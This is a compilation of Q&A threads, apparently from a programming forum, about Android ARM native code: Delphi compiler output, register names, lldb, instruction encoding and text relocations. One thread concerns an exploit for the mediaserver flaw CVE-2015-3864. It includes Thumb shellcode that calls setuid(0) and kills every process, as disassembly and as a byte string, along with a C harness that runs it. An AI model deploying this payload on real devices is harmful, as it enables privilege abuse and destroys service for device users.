How to affect Delphi XEx code generation for Android/ARM targets?

Update 2017-05-17. I no longer work for the company where this question originated, and do not have access to Delphi XEx. While I was there, the problem was solved by migrating to mixed FPC+GCC (Pascal+C), with NEON intrinsics for some routines where it made a difference. (FPC+GCC is highly recommended also because it enables using standard tools, particularly Valgrind.) If someone can demonstrate, with credible examples, how they are actually able to produce optimized ARM code from Delphi XEx, I'm happy to accept the answer.
Embarcadero's Delphi compilers use an LLVM backend to produce native ARM code for Android devices. I have large amounts of Pascal code that I need to compile into Android applications and I would like to know how to make Delphi generate more efficient code. Right now, I'm not even talking about advanced features like automatic SIMD optimizations, just about producing reasonable code. Surely there must be a way to pass parameters to the LLVM side, or somehow affect the result? Usually, any compiler will have many options to affect code compilation and optimization, but Delphi's ARM targets seem to be just "optimization on/off" and that's it.
LLVM is supposed to be capable of producing reasonably tight and sensible code, but Delphi seems to be using its facilities in a weird way. Delphi uses the stack very heavily, and it generally uses only registers r0-r3 as temporaries. Craziest of all, it seems to load normal 32-bit integers with four 1-byte load operations. How can I make Delphi produce better ARM code, without the byte-by-byte hassle it creates on Android?
At first I thought the byte-by-byte loading was for swapping byte order from big-endian, but that was not the case: it really just loads a 32-bit number with 4 single-byte loads. It might be doing that to load the full 32 bits without an unaligned word-sized memory load. (Whether it SHOULD avoid that is another matter, which would hint at the whole thing being a compiler bug.)
Let's look at this simple function:
function ReadInteger(APInteger : PInteger) : Integer;
begin
Result := APInteger^;
end;
Even with optimizations switched on, Delphi XE7 with update pack 1, as well as XE6, produce the following ARM assembly code for that function:
Disassembly of section .text._ZN16Uarmcodetestform11ReadIntegerEPi:
00000000 <_ZN16Uarmcodetestform11ReadIntegerEPi>:
0: b580 push {r7, lr}
2: 466f mov r7, sp
4: b083 sub sp, #12
6: 9002 str r0, [sp, #8]
8: 78c1 ldrb r1, [r0, #3]
a: 7882 ldrb r2, [r0, #2]
c: ea42 2101 orr.w r1, r2, r1, lsl #8
10: 7842 ldrb r2, [r0, #1]
12: 7803 ldrb r3, [r0, #0]
14: ea43 2202 orr.w r2, r3, r2, lsl #8
18: ea42 4101 orr.w r1, r2, r1, lsl #16
1c: 9101 str r1, [sp, #4]
1e: 9000 str r0, [sp, #0]
20: 4608 mov r0, r1
22: b003 add sp, #12
24: bd80 pop {r7, pc}
Just count the number of instructions and memory accesses Delphi needs for that. And constructing a 32 bit integer from 4 single-byte loads... If I change the function a little bit and use a var parameter instead of a pointer, it is slightly less convoluted:
Disassembly of section .text._ZN16Uarmcodetestform14ReadIntegerVarERi:
00000000 <_ZN16Uarmcodetestform14ReadIntegerVarERi>:
0: b580 push {r7, lr}
2: 466f mov r7, sp
4: b083 sub sp, #12
6: 9002 str r0, [sp, #8]
8: 6801 ldr r1, [r0, #0]
a: 9101 str r1, [sp, #4]
c: 9000 str r0, [sp, #0]
e: 4608 mov r0, r1
10: b003 add sp, #12
12: bd80 pop {r7, pc}
I won't include the disassembly here, but for iOS, Delphi produces identical code for the pointer and var parameter versions, and they are almost but not exactly the same as the Android var parameter version.
Edit: to clarify, the byte-by-byte loading is only on Android. And only on Android, the pointer and var parameter versions differ from each other. On iOS both versions generate exactly the same code.
For comparison, here's what FPC 2.7.1 (SVN trunk version from March 2014) thinks of the function with optimization level -O2. The pointer and var parameter versions are exactly the same.
Disassembly of section .text.n_p$armcodetest_$$_readinteger$pinteger$$longint:
00000000 <P$ARMCODETEST_$$_READINTEGER$PINTEGER$$LONGINT>:
0: 6800 ldr r0, [r0, #0]
2: 46f7 mov pc, lr
I also tested an equivalent C function with the C compiler that comes with the Android NDK.
int ReadInteger(int *APInteger)
{
return *APInteger;
}
And this compiles into essentially the same thing FPC made:
Disassembly of section .text._Z11ReadIntegerPi:
00000000 <_Z11ReadIntegerPi>:
0: 6800 ldr r0, [r0, #0]
2: 4770 bx lr

We are investigating the issue. In short, it depends on the potential misalignment (relative to a 32-bit boundary) of the Integer referenced by a pointer. We need a little more time to have all of the answers... and a plan to address this.
Marco Cantù, moderator on Delphi Developers
See also "Why are the Delphi zlib and zip libraries so slow under 64 bit?", as the Win64 libraries are shipped built without optimizations.
In Quality Portal report RSP-9922, "Bad ARM code produced by the compiler, $O directive ignored?", Marco added the following explanation:
There are multiple issues here:
As indicated, optimization settings apply only to entire unit files and not to individual functions. Simply put, turning optimization on and off in the same file will have no effect.
Furthermore, simply having "Debug information" enabled turns off optimization. Thus, when one is debugging, explicitly turning on optimizations will have no effect. Consequently, the CPU view in the IDE will not be able to display a disassembled view of optimized code.
Third, loading non-aligned 64bit data is not safe and does result in errors, hence the separate 4 one byte operations that are needed in given scenarios.


Run a shellcode in the context of mediaserver in Android

I am writing an exploit for a vulnerability in mediaserver on Android (CVE-2015-3864). The goal is to run shellcode with root privileges (for example, to kill all processes). Every step of the exploit works as expected until it reaches the shellcode (at this point the shellcode is loaded into mediaserver's virtual memory and has rwx permission). The shellcode is as follows:
1) e28f3001 add r3, pc, #1 ; 0x1
2) e12fff13 bx r3
3) 1b24 subs r4, r4, r4
4) 1c20 adds r0, r4, #0
5) 2717 movs r7, #23
6) df01 svc 1
7) 1a92 subs r2, r2, r2
8) 1c10 adds r0, r2, #0
9) 3801 subs r0, #1
10) 2109 movs r1, #9
11) 2725 movs r7, #37
12) df01 svc 1
Lines 1 and 2 switch from ARM mode to Thumb mode, lines 3 to 6 perform setuid(0), and lines 7 to 12 kill all running processes.
I debugged the exploit with IDA and found that the shellcode executes up to line 12 (all the registers have the values defined in the shellcode; for example, r7 is 37).
My specific problem is: the shellcode does not execute and has no effect on my device.
As a test case, I wrote a program that runs the shellcode through a function pointer, like this:
`char *SC = "\x01\x30\x8f\xe2"
"\x13\xff\x2f\xe1"
"\x24\x1b\x20\x1c"
"\x17\x27\x01\xdf"
"\x92\x1a\x10\x1c"
"\x01\x38\x09\x21"
"\x25\x27\x01\xdf"`
`
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC))
(*(void(*)()) SC)()
return 0
}`
I copied this binary to /system/bin and gave it exactly the same permissions as mediaserver has. I ran the binary with su permission and it worked: all the processes were killed.
My specific question is: why can the shellcode not be executed in the context of mediaserver, when it can be executed independently?
Please help, I'm really stuck at this point! If the question is unclear, let me know and I will explain it further.
Thanks in advance.
I think you need to elevate the privileges of mediaserver (which runs as user media) to kill all processes, and for that you need another vulnerability. There is a second problem due to SELinux sandbox restrictions: the mediaserver process targeted by the libstagefright exploit is confined by SELinux policy, so the code execution takes place in a restrictive sandbox. In other words, you would also need a way around SELinux; the NCC Group presentation has more details.
See also this good paper

lldb in Android Studio: select frame does not work

I'm doing native debugging in Android Studio 1.5. The problem is that the lldb looks at the wrong frame (the bottom-most) and thus does not show me the correct register values.
The frame select command does not seem to have any effect:
(lldb) bt
* thread #1: tid = 30637, 0x400e429e libc.so`strncpy, name = 'WHATEVER', stop reason = breakpoint 2.1
frame #0: 0x400e429e libc.so`strncpy
* frame #1: 0x406ba1b0 libicuuc.so
(lldb) frame info
frame #1: 0x406ba1b0 libicuuc.so
(lldb) frame select 0
frame #0: 0x400e429e libc.so`strncpy
libc.so`strncpy:
-> 0x400e429e <+0>: push {r4, lr}
0x400e42a0 <+2>: cbz r2, 0x400e42c4 ; <+38>
0x400e42a2 <+4>: subs r1, #0x1
0x400e42a4 <+6>: mov r3, r0
(lldb) frame info
frame #1: 0x406ba1b0 libicuuc.so
(lldb) register read
General Purpose Registers:
r4 = 0x40773ed4
r5 = 0x407762a8
r6 = 0x00000000
r7 = 0x40745eb0
r8 = 0xbe9f2d30
r9 = 0xbe9f2b20
r10 = 0x400f8384 libc.so`__stack_chk_guard
r11 = 0x77205d00
sp = 0xbe9f2d30
lr = 0x406ba1b1
pc = 0x75cdbd38
cpsr = 0x200b0030
5 registers were unavailable.
Any ideas/suggestions?
It sounds like Android Studio is resetting the frame after each command - probably to keep it in sync with what the UI is showing. You selected frame 0, but then your frame info command, which should show frame 0's info, shows frame 1's instead.
If you select some frame in the Android Studio UI, and then do frame info in the console, does it show the frame you selected in the UI? If that works then register read should also report the correct frame's registers, so you can use that as a work around for now.
If Android Studio has a bug reporter, you might file a bug about this issue. lldb has support for keeping a UI and the command line in sync, but the UI has to adopt it.

Android CPU register names?

This code fragment is extracted from an Android crash report on a Samsung Tab S:
Build fingerprint: 'samsung/chagallwifixx/chagallwifi:5.0.2/LRX22G/T800XXU1BOCC:user/release-keys'
Revision: '7'
ABI: 'arm'
r0 a0d840bc r1 a0dcb880 r2 00000001 r3 a0d840bc
r4 a0dc3c4c r5 00000000 r6 a066d200 r7 00000000
r8 32d68f40 r9 a0c359a8 sl 00000014 fp bef3ba84
ip a0dc3fb8 sp bef3ba10 lr a0c35a0c pc a0c34bc8 cpsr 400d0010
r0 through r9 are pretty clearly general-purpose registers, sp (r13) is the stack pointer, and pc (r15) is the program counter (instruction pointer). Referring to the Registers section of Wikipedia's ARM architecture page (one of many pages I looked through), I find that lr (r14) is the link register and cpsr is the "Current Program Status Register."
I would like to know what sl (r10), fp (r11) and ip (r12) are. I expect ip is not the "instruction pointer" because that function is done by pc (r15).
Is there a reference document I haven't found that illustrates these names?
The current ARM EABI procedure call standard outlines the standard 'special' names for r12-r15:
PC (r15): Program counter
LR (r14): Link register
SP (r13): Stack pointer
IP (r12): Intra-procedure-call scratch register*
The GNU tools also still support names from the deprecated legacy APCS as identifiers for the given register numbers, even though they no longer necessarily have any meaning:
FP (r11): Frame pointer - may still be true for ARM code; Thumb code tends to keep actual frame pointers in r7, and of course the code may be compiled without frame pointers at all, in which cases "fp" is just another callee-saved general register.
SL (r10): Stack limit - I don't actually know the history of that one, but in most modern code r10 is no more special than r4-r8.
Note that r9 is not necessarily a general-purpose register - the EABI reserves it for platform-specific purposes. Under linux-gnueabi it's nothing special, but other platforms may use it for special purposes like a TLS or global object table pointer, so it may also go by SB (static base) or TR (thread register).
* The story behind that is the limited range of the PC-relative branch instructions: if the linker finds that the target of a call ends up more than 32MB away, it may generate a veneer (some extra instructions within range of the call site) as the branch target, which computes the real address and performs an absolute branch, and for that it may need a scratch register.

ARM and Android

I knew nothing about ARM instructions and have only just started trying to understand them. I've read up a bit on ARM, and some of the better links were these:
Converting very simple ARM instructions to binary/hex
http://simplemachines.it/doc/arm_inst.pdf
According to the first link, instructions have the following format and are 32-bits:
[cond][00][immediate][opcode][alerts condition codes?][Rn][Rd][Operand 2]
However, when I disassembled some .so files, I saw that some of the instructions were 16 bits and had a different format.
Why the discrepancy? Is there a spec for this?
An example would be how it encodes mov.
A simple mov r0, #255 is 20ff, only 16 bits as opposed to 32. Strange (to me).
As I understand it, you can't normally specify an entire 32-bit value in one instruction. I don't know the syntax for assemblers to compile.
What I've been doing is editing existing .so files with a hex editor and running them.
I tried to AND two values but just couldn't do it, something like:
mov r0, #63 ;0x003f
mov r1, #16896 ;0x4200
and r0, r0, r1, lsl #8 ;should be 0x423f at this point
mov r15, r14 ;method returns at this point, right?
Except, I didn't have an assembler and had to do it like this:
Find method that returns int in disassembled .so file
Over-write entries
Run and see output
So, this is what I got:
mov r0 0x003f - 1110 00 1 1101 0 0000 0000 0000 00111111 - e3a0 003f
mov r1 0x0042 - 1110 00 1 1101 0 0000 0001 0000 01000010 - e3a0 1042
and r0, r0, r1, lsl #8 - 1110 00 0 0000 0 0000 0000 00001000 0001 - e000 0081
mov r15, r14 - 1110 00 0 1101 0 0000 1111 0000 0000 1110 - e1a0f00e
So I worked out the instructions, encoded them using a table, converted them to hex with a calculator, patched them in with a hex editor, transferred the file to my phone and ran the app.
And I just kept getting a zero when the method was called. Am I missing something here?
So, why does Android's ARM code seem to mix 16-bit instructions with 32-bit ones, and why isn't my little attempt working?
Do realize that when you say 'ARM instructions' that isn't just one instruction set but a multitude depending on the architecture and what extensions are supported. The document you linked to starts off by mentioning architecture v4 which if you check your favorite wiki for 'ARM architecture' - it would point out that v4 is a 'legacy' architecture.
Android itself started out on ARMv6, with most modern devices running ARMv7 or ARMv7a. While I don't know for sure, I would think the 16-bit instructions are Thumb-2 rather than the original Thumb extension, which was intended to improve code density back when ARM was designing for the embedded market of 10 to 20 years ago, where a megabyte was a lot of memory.
If you are learning, I would reference ARM's documentation available at their website:
http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0406b/index.html
and possibly look at the ARM instructions coming out of gcc:
http://gcc.gnu.org/onlinedocs/gcc/ARM-Options.html
and set up a cross-compiler for ARM so that you can take a higher-level language like C and generate ARM binaries.

mylib.so has text relocations. This is wasting memory and is a security risk. Please fix

My Android application (which uses a native library) prints this warning on Android 4.4:
linker mylib.so has text relocations. This is wasting memory and is a security risk. Please fix.
Do you have any idea what it is and how to fix it?
Thanks,
This would appear to be a result of two ndk-gcc bugs mentioned at https://code.google.com/p/android/issues/detail?id=23203, which are stated there to have been fixed as of ndk-r8c.
It would appear that the check for libraries with the issue has been added only recently.
Note: please do not edit this post to hide the link URL. It is explicit because the destination is what makes it authoritative.
Further note: changing NDK versions is only a fix when the warning is due to your application's code. It will have no effect if the warning is instead on a system component such as libdvm; that can only be fixed by a system update.
You need to make the code in your library position-independent: add -fpic or -fPIC to LOCAL_CFLAGS in your Android.mk. You also need to ensure that you're not linking against any static or shared libraries that themselves contain text relocations. If they do and you can recompile them, use one of the flags mentioned above.
In short, you need to compile your library with one of the -fpic or -fPIC flags, where PIC is an abbreviation for Position Independent Code.
The longer answer is that your library (yourlib.so) has been compiled in a manner that does not conform to the Google Android standard for an ELF file, in which the following Dynamic Array Tag entry is unexpected. In the best case the library will still run, but it is still an error, and future Android versions will probably not allow it to run.
DT_TEXTREL 0x16 (22)
To check what's in your library, use something along the lines of:
# readelf --wide -S yourlib.so
There are 37 section headers, starting at offset 0x40:
Section Headers:
[Nr] Name Type Address Off Size ES Flg Lk Inf Al
[ 0] NULL 0000000000000000 000000 000000 00 0 0 0
[ 1] .text PROGBITS 0000000000000000 002400 068f80 00 AX 0 0 16
[ 2] .rodata PROGBITS 0000000000000000 06b380 05ad00 00 WA 0 0 32
...
[16] .rela.text RELA 0000000000000000 26b8e8 023040 18 14 1 8
...
[36] .rela.debug_frame RELA 0000000000000000 25a608 0112e0 18 14 27 8
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
Please see my extensive answer on the topic, for more DT entry details. For details how to write proper dynamic libraries this is a must-read.
I got the same error with my application.
The application was using a native daemon that used a native library which did not implement all the functions declared in its header file. When I added the missing implementations to the native library, everything just worked.
I don't know if you have exactly the same issue, but it probably means your native side has some mismatch.
